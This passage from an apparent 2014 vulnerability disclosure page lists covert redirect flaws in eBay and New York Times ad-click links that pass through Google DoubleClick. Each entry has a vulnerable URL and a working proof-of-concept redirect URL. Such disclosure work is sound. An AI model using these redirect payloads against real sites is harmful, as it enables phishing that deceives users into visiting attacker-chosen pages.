<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=btuSq89khcQ&feature=youtu.be</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/google-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.2) </b></span><b>eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span><br />
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">ebay.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"eBay Inc. (stylized as ebay) is an American multinational corporation and e-commerce company, providing consumer to consumer & business to consumer sales services via Internet. It is headquartered in San Jose, California, United States. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble. Today, it is a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sales, the website has since expanded to include "Buy It Now" shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements (via Kijiji or eBay Classifieds); online event ticket trading (via StubHub); online money transfers (via PayPal) and other services. It is not a free website, but charges users an invoice fee when sellers have sold or listed any items." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/<wbr></wbr>aclk?sa=L%26ai=C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV%<wbr></wbr>26num=0%26sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ%<wbr></wbr>26client=ca-pub-<wbr></wbr>0466582109566532%26adurl=http:<wbr></wbr>//www.tetraph.com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=a4H-u17Y9ks" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=a4H-u17Y9ks</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://tetraph.blogspot.com/<wbr></wbr>2014/11/ebay-covert-redirect-<wbr></wbr>vulnerability.html</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.3) </b></span><b>The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">nytimes.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ffacebook%<wbr></wbr>2Ecom%2Fall%2Dinclusive%2Ephp%<wbr></wbr>3Futm%5Fsource%3Dnyt%26utm%<wbr></wbr>5Fmedium%3Ddisplay%26utm%<wbr></wbr>5Fcontent%3Dclicktracker%<wbr></wbr>26utm%5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ftetraph%<wbr></wbr>2Ecom%2Fsecurity%3F%<wbr></wbr>2Dinclusive%2Ephp%3Futm%<wbr></wbr>5Fsource%3Dnyt%26utm%5Fmedium%<wbr></wbr>3Ddisplay%26utm%5Fcontent%<wbr></wbr>3Dclicktracker%26utm%<wbr></wbr>5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=3XtrUqzxNW0" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=3XtrUqzxNW0</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/nytimes-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span></div>
